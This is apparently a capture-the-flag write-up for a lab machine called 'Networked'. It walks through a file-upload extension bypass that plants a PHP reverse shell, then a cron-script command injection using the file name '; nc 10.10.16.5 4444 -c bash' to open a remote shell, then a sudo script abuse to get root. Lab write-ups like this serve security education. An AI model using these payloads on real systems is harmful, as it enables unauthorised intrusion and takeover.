Networked

Gaining Access

Nmap scan:

File Upload RCE

First, we can use gobuster on the website:

The /backup directory would show us a directory with a backup file:

Within the backup file, there's this PHP code here:

<?php
require '/var/www/html/lib.php';

define("UPLOAD_DIR", "/var/www/html/uploads/");

if( isset($_POST['submit']) ) {
  if (!empty($_FILES["myFile"])) {
    $myFile = $_FILES["myFile"];

    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
      echo '<pre>Invalid image file.</pre>';
      displayform();
    }

    if ($myFile["error"] !== UPLOAD_ERR_OK) {
        echo "<p>An error occurred.</p>";
        displayform();
        exit;
    }

    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
    list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }

    if (!($valid)) {
      echo "<p>Invalid image file</p>";
      displayform();
      exit;
    }
    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;

    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
    if (!$success) {
        echo "<p>Unable to save file.</p>";
        exit;
    }
    echo "<p>file uploaded, refresh gallery</p>";

    // set proper permissions on the new file
    chmod(UPLOAD_DIR . $name, 0644);
  }
} else {
  displayform();
}
?>

In short, we can see that this file checks for the file extensions before accepting a file. Seeing that this is a PHP file, we can attempt to upload a PHP reverse shell. To bypass the extension check, notice how it uses substr_compare and verifies whether a valid extension is present. As such, we can create a file ending in .jpg.php to bypass this:

Then, we can upload it to upload.php. We can visit photos.php to trigger the shell:

Privilege Escalation

To Guly

Within the machine, we can view the user guly directory:

The crontab specifies that the user is running the check_attack script routinely.

One dangerous part of this script is the usage of exec to run stuff. The $value variable is not sanitised, and we can exploit this by creating a file with the name of ; nc 10.10.16.5 4444 -c bash within the /var/www/html/uploads directory. After doing this and waiting, we would gain a reverse shell and can capture the user flag:

To Root

We can check the sudo privileges of this user and find that there's one script we can run as root.

Here's the script's contents:

This takes user input and executes does not sanitise it at all. When we run the script, we can actually execute commands:

To get a root shell, we just need to run /bin/bash:

Rooted!